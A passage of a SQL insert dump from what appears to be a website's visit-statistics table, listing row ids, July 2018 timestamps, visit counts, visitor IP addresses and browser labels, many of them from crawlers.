,0,'54.36.148.194','other'),(275430,1531855121,1,1,0,0,'54.36.148.244','other'),(275431,1531855533,3,3,0,0,'92.113.189.235','chrome'),(275432,1531856164,1,1,0,0,'40.77.167.201','other'),(275433,1531856225,5,5,0,0,'216.244.66.241','other'),(275434,1531856899,1,1,0,0,'176.118.55.18','chrome'),(275435,1531856921,1,1,0,0,'40.77.167.10','other'),(275436,1531857487,1,1,0,0,'8.29.198.27','other'),(275437,1531857590,1,1,0,0,'216.244.66.241','other'),(275438,1531859173,1,0,1,0,'66.249.69.145',''),(275439,1531859342,2,2,0,0,'91.209.11.236','other'),(275440,1531859448,4,4,0,0,'216.244.66.241','other'),(275441,1531860171,2,2,0,0,'5.9.112.210','other'),(275442,1531860695,1,1,0,0,'157.55.39.154','other'),(275443,1531860741,1,1,0,0,'216.244.66.241','other'),(275444,1531861119,1,1,0,0,'91.209.11.236','other'),(275445,1531863568,1,1,0,0,'91.209.11.236','other'),(275446,1531863739,1,1,0,0,'178.154.171.88','other'),(275447,1531863894,2,0,2,0,'66.249.75.153',''),(275448,1531864052,1,1,0,0,'216.244.66.241','other'),(275449,1531864654,1,1,0,0,'8.29.198.27','other'),(275450,1531864774,1,1,0,0,'91.209.11.236','other'),(275451,1531866667,1,1,0,0,'40.77.167.203','other'),(275452,1531866685,1,1,0,0,'141.8.142.74','other'),(275453,1531866755,33,33,0,0,'79.143.185.25','other'),(275454,1531866864,3,3,0,0,'148.251.244.137','other'),(275455,1531867388,1,0,1,0,'66.249.69.145',''),(275456,1531868261,2,2,0,0,'91.209.11.236','other'),(275457,1531868329,1,1,0,0,'8.29.198.27','other'),(275458,1531869424,1,1,0,0,'216.244.66.241','other'),(275459,1531870339,1,1,0,0,'91.209.11.236','other'),(275460,1531870529,2,2,0,0,'141.8.142.74','other'),(275461,1531871093,11,11,0,0,'23.237.4.26','other'),(275462,1531871870,2,2,0,0,'91.209.11.236','other'),(275463,1531871924,1,1,0,0,'216.244.66.241','other'),(275464,1531872349,1,1,0,0,'54.36.148.183','other'),(275465,1531872661,1,1,0,0,'54.36.148.111','other'),(275466,1531872772,1,1,0,0,'54.36.148.95','other'),(275467,1531872897,1,1,0,0,'91.209.11.236','other'),(275468,1531872936,1,0,1,0,'66.249.69.145',''),(275469,1531873078,1,1,0,0,'54.36.148.103','other'),(275470,1531873121,1,1,0,0,'54.36.148.232','other'),(275471,1531873145,1,1,0,0,'54.36.148.176','other'),(275472,1531873457,1,1,0,0,'54.36.149.8','other'),(275473,1531873600,1,1,0,0,'54.36.148.139','other'),(275474,1531873616,1,1,0,0,'66.249.69.143','chrome'),(275475,1531873794,1,1,0,0,'54.36.148.226','other'),(275476,1531873866,1,1,0,0,'54.36.148.177','other'),(275477,1531874375,1,1,0,0,'91.209.11.236','other'),(275478,1531875245,1,1,0,0,'54.36.149.72','other'),(275479,1531875312,1,1,0,0,'66.249.69.145','chrome'),(275480,1531875421,1,1,0,0,'91.209.11.236','other'),(275481,1531875487,1,1,0,0,'8.29.198.27','other'),(275482,1531875540,1,1,0,0,'54.36.148.142','other'),(275483,1531875952,1,1,0,0,'54.36.149.71','other'),(275484,1531876343,1,1,0,0,'54.36.149.105','other'),(275485,1531876494,1,1,0,0,'54.36.149.18','other'),(275486,1531876881,1,1,0,0,'54.36.149.65','other'),(275487,1531877202,1,1,0,0,'40.77.167.204','other'),(275488,1531877956,1,1,0,0,'54.36.148.33','other'),(275489,1531878010,1,1,0,0,'52.41.211.72','chrome'),(275490,1531878024,1,1,0,0,'54.36.149.89','other'),(275491,1531878434,1,1,0,0,'216.244.66.241','other'),(275492,1531878606,1,1,0,0,'54.36.148.160','other'),(275493,1531878751,1,1,0,0,'54.36.148.16','other'),(275494,1531878836,2,2,0,0,'54.36.148.124','other'),(275495,1531878871,2,2,0,0,'91.209.11.236','other'),(275496,1531879155,1,1,0,0,'8.29.198.25','other'),(275497,1531879203,1,1,0,0,'54.36.148.72','other'),(275498,1531879223,1,1,0,0,'54.36.149.67','other'),(275499,1531879365,1,1,0,0,'54.36.148.203','other'),(275500,1531879583,1,1,0,0,'54.36.149.62','other'),(275501,1531879649,1,1,0,0,'54.36.149.79','other'),(275502,1531879875,2,2,0,0,'91.209.11.236','other'),(275503,1531879991,1,1,0,0,'54.36.149.12','other'),(275504,1531880195,1,1,0,0,'54.36.148.83','other'),(275505,1531880507,1,1,0,0,'54.36.148.126','other'),(275506,1531880524,1,1,0,0,'216.244.66.241','other'),(275507,1531880600,1,1,0,0,'54.36.149.92','other'),(275508,1531880839,1,1,0,0,'54.36.149.85','other'),(275509,1531880854,1,1,0,0,'54.36.148.148','other'),(275510,1531881281,1,1,0,0,'54.36.149.94','other'),(275511,1531881457,1,1,0,0,'54.36.149.1','other'),(275512,1531881579,2,2,0,0,'91.209.11.236','other'),(275513,1531881714,3,3,0,0,'216.244.66.241','other'),(275514,1531881863,1,1,0,0,'54.36.148.90','other'),(275515,1531881915,1,1,0,0,'141.8.142.74','other'),(275516,1531882039,1,1,0,0,'54.36.148.172','other'),(275517,1531882269,1,1,0,0,'54.36.148.33','other'),(275518,1531882276,1,1,0,0,'54.36.148.56','other'),(275519,1531882699,3,3,0,0,'216.244.66.241','other'),(275520,1531883232,1,0,1,0,'66.249.69.143',''),(275521,1531883563,1,1,0,0,'54.36.148.79','other'),(275522,1531883574,1,1,0,0,'54.36.148.180','other'),(275523,1531883638,2,2,0,0,'141.8.142.74','other'),(275524,1531883681,1,1,0,0,'216.244.66.241','other'),(275525,1531883713,1,1,0,0,'54.36.148.220','other'),(275526,1531883770,1,1,0,0,'54.36.149.9','other'),(275527,1531883902,1,1,0,0,'54.36.148.56','other'),(275528,1531883941,1,1,0,0,'54.36.148.160','other'),(275529,1531884052,1,0,1,0,'66.249.69.144',''),(275530,1531884175,1,1,0,0,'54.36.149.106','other'),(275531,1531884285,1,1,0,0,'91.209.11.236','other'),(275532,1531884611,1,1,0,0,'54.36.148.50','other'),(275533,1531884764,1,1,0,0,'54.36.148.235','other'),(275534,1531884935,1,1,0,0,'54.36.148.193','other'),(275535,1531885250,1,1,0,0,'54.36.148.105','other'),(275536,1531885264,1,1,0,0,'91.209.11.236','other'),(275537,1531885625,1,1,0,0,'66.249.75.157','chrome'),(275538,1531885824,1,1,0,0,'54.36.148.113','other'),(275539,1531886119,3,3,0,0,'216.244.66.241','other'),(275540,1531886133,1,1,0,0,'54.36.148.77','other'),(275541,1531886320,1,1,0,0,'8.29.198.25','other'),(275542,1531886424,2,2,0,0,'195.10.210.49','chrome'),(275543,1531886472,1,1,0,0,'54.36.149.80','other'),(275544,1531886653,1,0,1,0,'66.249.69.144',''),(275545,1531886763,1,1,0,0,'54.36.148.200','other'),(275546,1531886858,1,1,0,0,'66.249.69.144','chrome'),(275547,1531886961,1,1,0,0,'54.36.148.87','other'),(275548,1531887202,1,1,0,0,'216.244.66.241','other'),(275549,1531887445,1,1,0,0,'54.36.148.99','other'),(275550,1531887565,1,1,0,0,'54.36.148.248','other'),(275551,1531887943,1,1,0,0,'54.36.148.90','other'),(275552,1531888072,1,1,0,0,'195.10.210.49','chrome'),(275553,1531888166,1,1,0,0,'54.36.149.34','other'),(275554,1531888234,2,2,0,0,'216.244.66.241','other'),(275555,1531888295,1,1,0,0,'54.36.148.164','other'),(275556,1531888595,1,1,0,0,'40.77.167.202','other'),(275557,1531888634,1,1,0,0,'54.36.149.63','other'),(275558,1531888732,1,1,0,0,'54.36.149.83','other'),(275559,1531888758,1,1,0,0,'54.36.148.29','other'),(275560,1531888780,1,1,0,0,'54.36.148.136','other'),(275561,1531888908,1,0,1,0,'66.249.75.155',''),(275562,1531888923,1,1,0,0,'54.36.148.78','other'),(275563,1531888941,1,1,0,0,'54.36.148.216','other'),(275564,1531889068,1,1,0,0,'178.154.171.88','other'),(275565,1531889077,2,2,0,0,'91.209.11.236','other'),(275566,1531889227,2,2,0,0,'95.213.141.126','opera'),(275567,1531889231,1,1,0,0,'54.36.148.248','other'),(275568,1531889658,1,1,0,0,'54.36.148.106','other'),(275569,1531889979,1,1,0,0,'8.29.198.25','other'),(275570,1531890051,1,1,0,0,'54.36.148.122','other'),(275571,1531890239,1,1,0,0,'54.36.148.79','other'),(275572,1531890643,1,0,1,0,'66.249.69.143',''),(275573,1531890887,1,1,0,0,'91.209.11.236','other'),(275574,1531890907,1,1,0,0,'54.36.148.145','other'),(275575,1531891437,1,1,0,0,'54.36.148.181','other'),(275576,1531891646,1,1,0,0,'54.36.148.103','other'),(275577,1531892068,1,1,0,0,'46.201.93.171','chrome'),(275578,1531892455,1,0,1,0,'66.249.69.145',''),(275579,1531892464,1,0,1,0,'66.249.75.153',''),(275580,1531892503,1,1,0,0,'66.249.69.145','chrome'),(275581,1531892539,1,1,0,0,'91.124.182.170','firefox'),(275582,1531892742,1,1,0,0,'91.209.11.236','other'),(275583,1531892958,1,1,0,0,'130.180.212.142','chrome'),(275584,1531892967,1,1,0,0,'193.227.119.23','chrome'),(275585,1531893021,1,1,0,0,'54.36.148.225','other'),(275586,1531893028,1,1,0,0,'54.36.148.242','other'),(275587,1531893089,1,1,0,0,'54.36.148.224','other'),(275588,1531893216,2,2,0,0,'54.36.149.98','other'),(275589,1531893217,1,1,0,0,'92.113.18.88','chrome'),(275590,1531893450,1,1,0,0,'54.36.149.65','other'),(275591,1531893551,2,2,0,0,'91.196.178.86','chrome'),(275592,1531893576,1,1,0,0,'54.36.148.158','other'),(275593,1531893599,1,1,0,0,'54.36.148.90','other'),(275594,1531893708,1,1,0,0,'54.36.149.38','other'),(275595,1531894079,1,1,0,0,'95.132.29.38','firefox'),(275596,1531894257,1,1,0,0,'54.36.148.212','other'),(275597,1531894267,1,0,1,0,'66.249.69.145',''),(275598,1531894314,1,1,0,0,'54.36.148.62','other'),(275599,1531894563,1,1,0,0,'54.36.148.103','other'),(275600,1531894599,1,1,0,0,'54.36.148.106','other'),(275601,1531894889,1,1,0,0,'91.209.11.236','other'),(275602,1531894984,1,1,0,0,'54.36.149.75','other'),(275603,1531895084,1,1,0,0,'54.36.148.246','other'),(275604,1531895270,1,1,0,0,'40.77.167.205','other'),(275605,1531895415,1,1,0,0,'54.36.148.239','other'),(275606,1531895450,1,1,0,0,'54.36.148.116','other'),(275607,1531895465,1,1,0,0,'216.244.66.241','other'),(275608,1531895787,1,1,0,0,'54.36.149.93','other'),(275609,1531895815,1,1,0,0,'54.36.148.200','other'),(275610,1531895941,1,1,0,0,'54.36.148.120','other'),(275611,1531895996,1,1,0,0,'54.36.149.14','other'),(275612,1531896401,2,2,0,0,'91.196.178.169','chrome'),(275613,1531896897,1,1,0,0,'54.36.148.15','other'),(275614,1531896963,1,1,0,0,'46.201.93.171','chrome'),(275615,1531897156,1,1,0,0,'8.29.198.25','other'),(275616,1531897159,1,1,0,0,'195.230.119.59','chrome'),(275617,1531897168,1,1,0,0,'54.36.148.25','other'),(275618,1531897238,1,0,1,0,'66.249.75.157',''),(275619,1531897259,2,0,2,0,'66.249.69.144',''),(275620,1531897875,1,1,0,0,'54.36.148.66','other'),(275621,1531897953,1,1,0,0,'91.124.182.170','firefox'),(275622,1531898087,1,1,0,0,'91.209.11.236','other'),(275623,1531898127,1,1,0,0,'54.36.149.36','other'),(275624,1531898172,2,2,0,0,'78.111.190.253','chrome'),(275625,1531898339,15,15,0,0,'95.216.5.188','other'),(275626,1531898393,1,1,0,0,'54.36.149.14','other'),(275627,1531898422,1,1,0,0,'54.36.148.219','other'),(275628,1531898557,1,1,0,0,'54.36.148.155','other'),(275629,1531898603,1,1,0,0,'216.244.66.241','other'),(275630,1531898784,1,1,0,0,'54.36.149.107','other'),(275631,1531898844,1,1,0,0,'54.36.148.153','other'),(275632,1531898917,1,1,0,0,'40.77.167.204','other'),(275633,1531898922,2,2,0,0,'40.77.167.202','other'),(275634,1531898929,1,1,0,0,'178.154.171.88','other'),(275635,1531899097,1,0,1,0,'66.249.75.157',''),(275636,1531899193,1,1,0,0,'91.209.11.236','other'),(275637,1531899200,1,1,0,0,'54.36.148.137','other'),(275638,1531899225,1,0,1,0,'66.249.75.155',''),(275639,1531899261,1,1,0,0,'54.36.148.69','other'),(275640,1531899455,1,0,1,0,'66.249.69.145',''),(275641,1531900173,1,1,0,0,'54.36.149.0','other'),(275642,1531900188,1,1,0,0,'54.36.148.29','other'),(275643,1531900645,1,1,0,0,'54.36.148.107','other'),(275644,1531900722,2,2,0,0,'91.209.11.236','other'),(275645,1531900768,1,1,0,0,'54.36.149.100','other'),(275646,1531900805,1,1,0,0,'8.29.198.26','other'),(275647,1531900827,1,1,0,0,'54.36.148.222','other'),(275648,1531900872,2,2,0,0,'216.244.66.241','other'),(275649,1531901289,1,1,0,0,'54.36.149.17','other'),(275650,1531901514,1,1,0,0,'54.36.148.216','other'),(275651,1531901855,1,1,0,0,'54.36.149.101','other'),(275652,1531901904,1,1,0,0,'5.9.61.101','other'),(275653,1531901946,1,1,0,0,'54.36.148.154','other'),(275654,1531901966,1,0,1,0,'66.249.75.153',''),(275655,1531902087,1,1,0,0,'54.36.148.120','other'),(275656,1531902122,1,1,0,0,'176.96.197.180','chrome'),(275657,1531902318,1,1,0,0,'91.124.182.170','firefox'),(275658,1531902325,2,2,0,0,'91.196.178.78','chrome'),(275659,1531902423,1,1,0,0,'54.36.148.175','other'),(275660,1531902486,1,1,0,0,'141.8.142.74','other'),(275661,1531902729,1,1,0,0,'178.95.66.69','chrome'),(275662,1531902743,1,1,0,0,'54.36.148.249','other'),(275663,1531902852,1,1,0,0,'54.36.148.28','other'),(275664,1531902948,2,2,0,0,'216.244.66.241','other'),(275665,1531903154,1,1,0,0,'37.53.137.43','chrome'),(275666,1531903205,1,1,0,0,'54.36.149.39','other'),(275667,1531903605,1,1,0,0,'195.24.137.118','chrome'),(275668,1531903711,1,1,0,0,'194.126.224.7','chrome'),(275669,1531903944,1,1,0,0,'54.36.148.115','other'),(275670,1531904180,1,1,0,0,'217.25.204.7','chrome'),(275671,1531904409,1,1,0,0,'54.36.148.47','other'),(275672,1531904536,1,1,0,0,'66.249.75.155','chrome'),(275673,1531904881,1,1,0,0,'54.36.149.33','other'),(275674,1531904982,1,1,0,0,'54.36.148.45','other'),(275675,1531905124,1,1,0,0,'54.36.148.121','other'),(275676,1531905223,1,1,0,0,'91.196.178.133','firefox'),(275677,1531905362,1,1,0,0,'54.36.149.39','other'),(275678,1531905548,2,2,0,0,'91.209.11.236','other'),(275679,1531905578,1,1,0,0,'54.36.149.20','other'),(275680,1531905606,1,1,0,0,'66.249.69.145','chrome'),(275681,1531905628,1,1,0,0,'66.249.69.144','chrome'),(275682,1531905698,1,0,1,0,'66.249.75.157',''),(275683,1531905733,1,1,0,0,'66.249.69.143','chrome'),(275684,1531905771,1,1,0,0,'54.36.149.42','other'),(275685,1531906036,1,1,0,0,'54.36.148.23','other'),(275686,1531906272,2,2,0,0,'216.244.66.241','other'),(275687,1531906294,1,1,0,0,'54.36.149.24','other'),(275688,1531906547,1,1,0,0,'54.36.148.114','other'),(275689,1531907091,1,1,0,0,'46.200.163.53','chrome'),(275690,1531907219,1,1,0,0,'54.36.148.50','other'),(275691,1531907221,1,1,0,0,'40.77.167.205','other'),(275692,1531907223,1,1,0,0,'91.196.178.88','chrome'),(275693,1531907277,1,1,0,0,'91.209.11.236','other'),(275694,1531907283,2,2,0,0,'91.196.178.78','chrome'),(275695,1531907286,1,1,0,0,'54.36.148.147','other'),(275696,1531907961,2,2,0,0,'91.196.178.165','chrome'),(275697,1531907991,1,1,0,0,'8.29.198.27','other'),(275698,1531908029,1,1,0,0,'46.200.215.31','firefox'),(275699,1531908031,1,1,0,0,'54.36.148.185','other'),(275700,1531908036,1,1,0,0,'91.196.178.169','chrome'),(275701,1531908106,1,1,0,0,'54.36.149.59','other'),(275702,1531908374,1,1,0,0,'66.249.69.145','chrome'),(275703,1531908625,1,1,0,0,'54.36.149.28','other'),(275704,1531908630,1,1,0,0,'66.249.75.153','chrome'),(275705,1531909328,1,0,1,0,'66.249.75.155',''),(275706,1531909337,61,61,0,0,'173.208.130.202','other'),(275707,1531909376,1,1,0,0,'54.36.148.21','other'),(275708,1531909495,1,1,0,0,'91.209.11.236','other'),(275709,1531909506,1,1,0,0,'54.36.148.75','other'),(275710,1531909647,1,1,0,0,'54.36.148.58','other'),(275711,1531909770,1,1,0,0,'141.8.142.74','other'),(275712,1531910008,1,1,0,0,'54.36.148.167','other'),(275713,1531910243,2,0,2,0,'66.249.69.144',''),(275714,1531910617,1,1,0,0,'54.36.148.34','other'),(275715,1531910801,1,1,0,0,'54.36.148.49','other'),(275716,1531910878,1,1,0,0,'54.36.148.82','other'),(275717,1531911037,1,1,0,0,'54.36.148.199','other'),(275718,1531911124,1,1,0,0,'54.36.148.74','other'),(275719,1531911300,1,1,0,0,'216.244.66.241','other'),(275720,1531911340,2,2,0,0,'91.209.11.236','other'),(275721,1531911457,1,1,0,0,'54.36.148.83','other'),(275722,1531911649,1,1,0,0,'141.8.142.74','other'),(275723,1531911661,1,1,0,0,'8.29.198.25','other'),(275724,1531911674,3,3,0,0,'167.114.1.124','other'),(275725,1531911803,1,1,0,0,'178.154.171.88','other'),(275726,1531911837,1,1,0,0,'40.77.167.204','other'),(275727,1531911912,1,1,0,0,'54.36.149.0','other'),(275728,1531912519,1,1,0,0,'54.36.149.97','other'),(275729,1531912988,1,0,1,0,'66.249.69.144',''),(275730,1531913201,1,1,0,0,'54.36.149.2','other'),(275731,1531913296,1,1,0,0,'91.209.11.236','other'),(275732,1531913484,1,1,0,0,'178.154.171.88','other'),(275733,1531913543,1,1,0,0,'91.196.178.103','chrome'),(275734,1531913778,1,1,0,0,'54.36.149.22','other'),(275735,1531913967,1,0,1,0,'66.249.69.143',''),(275736,1531914178,1,1,0,0,'40.77.167.204','other'),(275737,1531914182,2,2,0,0,'144.76.166.14','other'),(275738,1531914184,1,1,0,0,'195.201.86.154','other'),(275739,1531914185,3,3,0,0,'136.243.77.106','other'),(275743,1531914400,1,1,0,0,'54.36.148.14','other'),(275744,1531914429,1,1,0,0,'54.36.148.58','other'),(275745,1531914487,2,0,2,0,'66.249.69.145',''),(275746,1531914587,1,1,0,0,'95.133.5.122','firefox'),(275747,1531914620,1,1,0,0,'91.209.11.236','other'),(275748,1531914780,1,1,0,0,'31.223.224.135','firefox'),(275749,1531914888,1,1,0,0,'54.36.148.174','other'),(275750,1531914906,1,1,0,0,'54.36.148.221','other'),(275751,1531915176,1,1,0,0,'54.36.149.94','other'),(275752,1531915198,1,1,0,0,'54.36.148.42','other'),(275753,1531915256,1,1,0,0,'54.36.149.83','other'),(275754,1531915383,1,1,0,0,'54.36.148.220','other'),(275755,1531915443,1,1,0,0,'54.36.149.27','other'),(275756,1531915555,1,1,0,0,'54.36.148.252','other'),(275757,1531915618,1,1,0,0,'54.36.149.93','other'),(275758,1531915816,3,3,0,0,'46.211.132.248','chrome'),(275759,1531915850,1,1,0,0,'54.36.149.92','other'),(275760,1531915992,2,2,0,0,'216.244.66.241','other'),(275761,1531916160,2,0,2,0,'66.249.69.145',''),(275762,1531916220,1,1,0,0,'54.36.148.170','other'),(275763,1531916222,1,1,0,0,'54.36.148.131','other'),(275764,1531916428,1,0,1,0,'66.249.69.144',''),(275765,1531916568,1,1,0,0,'162.210.196.100','other'),(275766,1531916638,1,1,0,0,'54.36.149.67','other'),(275767,1531916765,1,1,0,0,'91.229.121.2','chrome'),(275768,1531916857,1,1,0,0,'54.36.148.37','other'),(275769,1531916987,1,1,0,0,'54.36.148.168','other'),(275770,1531917060,1,1,0,0,'185.155.91.84','chrome'),(275771,1531917091,1,1,0,0,'54.36.148.41','other'),(275772,1531917101,1,1,0,0,'91.209.11.236','other'),(275773,1531917323,1,1,0,0,'91.196.178.68','firefox'),(275774,1531917680,1,1,0,0,'54.36.148.73','other'),(275775,1531917757,1,1,0,0,'54.36.148.165','other'),(275776,1531917790,1,1,0,0,'91.229.121.2','chrome'),(275777,1531918114,1,1,0,0,'54.36.149.25','other'),(275778,1531918419,1,1,0,0,'54.36.148.145','other'),(275779,1531918832,1,1,0,0,'8.29.198.26','other'),(275780,1531918887,1,0,1,0,'66.249.69.145',''),(275781,1531919082,1,1,0,0,'54.36.148.207','other'),(275782,1531919185,1,1,0,0,'54.36.148.87','other'),(275783,1531919262,2,1,1,0,'66.249.69.145',''),(275784,1531919384,1,1,0,0,'54.36.148.154','other'),(275785,1531919387,1,1,0,0,'54.36.148.64','other'),(275786,1531919392,1,1,0,0,'95.163.255.116','other'),(275787,1531919417,1,1,0,0,'95.163.255.102','other'),(275788,1531919443,1,1,0,0,'95.163.255.105','other'),(275789,1531919524,1,1,0,0,'95.163.255.108','other'),(275790,1531919586,1,0,1,0,'66.249.69.144',''),(275791,1531919616,1,1,0,0,'95.163.255.106','other'),(275792,1531919683,1,1,0,0,'95.163.255.114','other'),(275793,1531919805,1,1,0,0,'95.163.255.115','other'),(275794,1531920143,1,1,0,0,'54.36.148.122','other'),(275795,1531920328,1,1,0,0,'54.36.148.118','other'),(275796,1531920537,1,1,0,0,'95.133.17.119','firefox'),(275797,1531920719,1,1,0,0,'54.36.149.82','other'),(275798,1531920720,1,1,0,0,'66.249.75.157','chrome'),(275799,1531920935,1,1,0,0,'54.36.149.35','other'),(275800,1531921563,1,1,0,0,'54.36.148.101','other'),(275801,1531921568,1,1,0,0,'54.36.148.16','other'),(275802,1531921605,1,1,0,0,'37.53.137.43','chrome'),(275803,1531921990,2,2,0,0,'91.196.178.78','chrome'),(275804,1531922030,1,1,0,0,'54.36.148.151','other'),(275805,1531922079,1,0,1,0,'66.249.69.143',''),(275806,1531922171,1,1,0,0,'54.36.148.243','other'),(275807,1531922234,1,1,0,0,'54.36.148.122','other'),(275808,1531922492,1,1,0,0,'8.29.198.26','other'),(275809,1531922576,1,1,0,0,'216.244.66.241','other'),(275810,1531922718,1,1,0,0,'54.36.149.12','other'),(275811,1531922801,1,1,0,0,'54.36.148.19','other'),(275812,1531922874,1,1,0,0,'54.36.148.36','other'),(275813,1531923132,1,1,0,0,'54.36.148.27','other'),(275814,1531923278,1,1,0,0,'54.36.148.79','other'),(275815,1531923286,1,1,0,0,'91.196.178.89','firefox'),(275816,1531923468,1,1,0,0,'54.36.149.47','other'),(275817,1531923743,1,1,0,0,'141.8.142.74','other'),(275818,1531923980,1,1,0,0,'54.36.149.27','other'),(275819,1531924120,1,0,1,0,'66.249.69.144',''),(275820,1531924307,1,1,0,0,'40.77.167.203','other'),(275821,1531924488,1,1,0,0,'66.249.69.145','chrome'),(275822,1531924627,1,1,0,0,'54.36.148.17','other'),(275823,1531924739,1,1,0,0,'54.36.148.156','other'),(275824,1531924809,1,1,0,0,'54.36.149.85','other'),(275825,1531924875,1,1,0,0,'54.36.148.173','other'),(275826,1531925025,1,1,0,0,'54.36.148.194','other'),(275827,1531925232,1,1,0,0,'54.36.149.34','other'),(275828,1531925235,1,1,0,0,'54.36.149.58','other'),(275829,1531925701,1,1,0,0,'216.244.66.241','other'),(275830,1531925874,1,0,1,0,'66.249.69.144',''),(275831,1531925876,1,1,0,0,'54.36.149.38','other'),(275832,1531925909,1,0,1,0,'66.249.69.143',''),(275833,1531926049,1,1,0,0,'188.230.43.254','other'),(275834,1531926257,1,1,0,0,'54.36.149.53','other'),(275835,1531926296,1,1,0,0,'54.36.148.143','other'),(275836,1531926360,1,1,0,0,'54.36.148.125','other'),(275837,1531926519,1,1,0,0,'66.249.75.157','chrome'),(275838,1531926675,1,1,0,0,'216.244.66.241','other'),(275839,1531926755,1,1,0,0,'54.36.149.31','other'),(275840,1531926820,1,1,0,0,'54.36.148.58','other'),(275841,1531927001,1,1,0,0,'180.76.15.139','other'),(275842,1531927317,1,1,0,0,'54.36.149.61','other'),(275843,1531927392,1,1,0,0,'180.76.15.155','other'),(275844,1531927474,1,1,0,0,'54.36.148.234','other'),(275845,1531927483,1,1,0,0,'54.36.149.54','other'),(275846,1531927501,1,1,0,0,'141.8.142.74','other'),(275847,1531927667,1,1,0,0,'54.36.149.7','other'),(275848,1531927735,1,1,0,0,'54.36.148.251','other'),(275849,1531927797,1,1,0,0,'54.36.148.244','other'),(275850,1531927805,1,1,0,0,'54.36.148.208','other'),(275851,1531927822,1,1,0,0,'54.36.148.50','other'),(275852,1531928036,1,1,0,0,'54.36.149.19','other'),(275853,1531928062,1,1,0,0,'69.30.213.82','other'),(275854,1531928118,1,1,0,0,'54.36.148.111','other'),(275855,1531928436,1,1,0,0,'54.36.148.233','other'),(275856,1531928448,1,1,0,0,'188.230.43.254','other'),(275857,1531928998,1,1,0,0,'54.36.148.10','other'),(275858,1531929082,1,1,0,0,'54.36.149.97','other'),(275859,1531929190,1,1,0,0,'54.36.148.149','other'),(275860,1531929193,1,1,0,0,'54.36.148.136','other'),(275861,1531929428,1,1,0,0,'54.36.148.141','other'),(275862,1531929678,1,1,0,0,'8.29.198.25','other'),(275863,1531929683,1,1,0,0,'54.36.148.151','other'),(275864,1531929717,1,1,0,0,'54.36.149.95','other'),(275865,1531929819,1,1,0,0,'54.36.148.46','other'),(275866,1531929856,1,1,0,0,'178.154.171.88','other'),(275867,1531930086,1,1,0,0,'216.244.66.241','other'),(275868,1531930284,1,1,0,0,'66.249.69.144','chrome'),(275869,1531931230,1,1,0,0,'109.86.145.247','chrome'),(275870,1531931314,1,1,0,0,'54.36.148.132','other'),(275871,1531931337,1,0,1,0,'66.249.75.153',''),(275872,1531931387,1,1,0,0,'54.36.148.74','other'),(275873,1531931399,1,1,0,0,'54.36.148.25','other'),(275874,1531931449,1,1,0,0,'188.230.43.254','other'),(275875,1531931482,1,1,0,0,'54.36.149.59','other'),(275876,1531931552,1,1,0,0,'54.36.148.56','other'),(275877,1531931610,1,1,0,0,'216.244.66.241','other'),(275878,1531931613,1,1,0,0,'54.36.148.88','other'),(275879,1531931623,1,1,0,0,'54.36.148.47','other'),(275880,1531932014,1,1,0,0,'54.36.148.210','other'),(275881,1531932057,1,1,0,0,'54.36.148.208','other'),(275882,1531932250,1,1,0,0,'54.36.148.127','other'),(275883,1531932661,1,1,0,0,'54.36.148.51','other'),(275884,1531932729,1,1,0,0,'54.36.149.34','other'),(275885,1531932842,1,1,0,0,'54.36.149.46','other'),(275886,1531932901,1,1,0,0,'216.244.66.241','other'),(275887,1531932925,1,1,0,0,'54.36.148.187','other'),(275888,1531933255,1,1,0,0,'54.36.148.75','other'),(275889,1531933323,1,1,0,0,'8.29.198.26','other'),(275890,1531933641,1,1,0,0,'40.77.167.204','other'),(275891,1531933643,1,1,0,0,'66.249.75.157','chrome'),(275892,1531933709,1,1,0,0,'54.36.148.74','other'),(275893,1531933712,1,1,0,0,'54.36.149.15','other'),(275894,1531933814,2,0,2,0,'66.249.69.143',''),(275895,1531933863,1,1,0,0,'54.36.148.11','other'),(275896,1531934376,1,1,0,0,'216.244.66.241','other'),(275897,1531934418,1,1,0,0,'54.36.149.96','other'),(275898,1531934578,1,1,0,0,'54.36.148.230','other'),(275899,1531935333,1,1,0,0,'149.202.82.11','other'),(275900,1531936019,1,1,0,0,'54.36.148.222','other'),(275901,1531936248,2,2,0,0,'216.244.66.241','other'),(275902,1531936452,1,1,0,0,'54.36.148.154','other'),(275903,1531936455,1,1,0,0,'54.36.148.76','other'),(275904,1531936503,1,1,0,0,'54.36.149.12','other'),(275905,1531936646,1,1,0,0,'54.36.149.69','other'),(275906,1531936675,2,2,0,0,'91.209.11.236','other'),(275907,1531937005,1,0,1,0,'66.249.75.153',''),(275908,1531937068,3,3,0,0,'92.113.189.235','chrome'),(275909,1531937127,1,1,0,0,'54.36.148.188','other'),(275910,1531937235,2,2,0,0,'91.196.178.188','chrome'),(275911,1531937532,1,1,0,0,'54.36.148.80','other'),(275912,1531937612,1,1,0,0,'54.36.149.101','other'),(275913,1531938324,1,1,0,0,'54.36.148.106','other'),(275914,1531938414,1,1,0,0,'54.36.148.94','other'),(275915,1531938742,1,1,0,0,'40.77.167.204','other'),(275916,1531939061,1,1,0,0,'66.249.69.143','chrome'),(275917,1531939555,1,1,0,0,'91.196.178.136','firefox'),(275918,1531939599,1,1,0,0,'54.36.149.7','other'),(275919,1531939630,1,1,0,0,'141.8.142.74','other'),(275920,1531939631,1,1,0,0,'178.154.171.88','other'),(275921,1531939643,1,1,0,0,'66.249.75.155','chrome'),(275922,1531939721,3,0,3,0,'66.249.69.144',''),(275923,1531940124,1,1,0,0,'54.36.148.19','other'),(275924,1531940195,1,1,0,0,'54.36.148.59','other'),(275925,1531940286,1,1,0,0,'54.36.148.142','other'),(275926,1531940512,1,1,0,0,'8.29.198.25','other'),(275927,1531940752,1,0,1,0,'66.249.69.143',''),(275928,1531940766,1,1,0,0,'54.36.148.217','other'),(275929,1531940848,1,1,0,0,'54.36.148.20','other'),(275930,1531940935,1,1,0,0,'178.154.171.88','other'),(275931,1531940938,1,1,0,0,'54.36.148.189','other'),(275932,1531941036,1,1,0,0,'54.36.148.185','other'),(275933,1531941128,1,1,0,0,'54.36.149.12','other'),(275934,1531941310,1,1,0,0,'54.36.148.47','other'),(275935,1531941318,3,3,0,0,'216.244.66.241','other'),(275936,1531941691,1,1,0,0,'92.52.137.116','chrome'),(275937,1531942109,1,0,1,0,'66.249.69.144',''),(275938,1531942373,1,1,0,0,'54.36.148.253','other'),(275939,1531942404,1,1,0,0,'54.36.148.96','other'),(275940,1531942440,1,1,0,0,'54.36.149.23','other'),(275941,1531942456,1,1,0,0,'54.36.148.99','other'),(275942,1531942902,1,1,0,0,'40.77.167.203','other'),(275943,1531942923,1,1,0,0,'54.36.148.137','other'),(275944,1531943153,1,1,0,0,'54.36.148.250','other'),(275945,1531943332,1,1,0,0,'54.36.148.115','other'),(275946,1531944147,1,1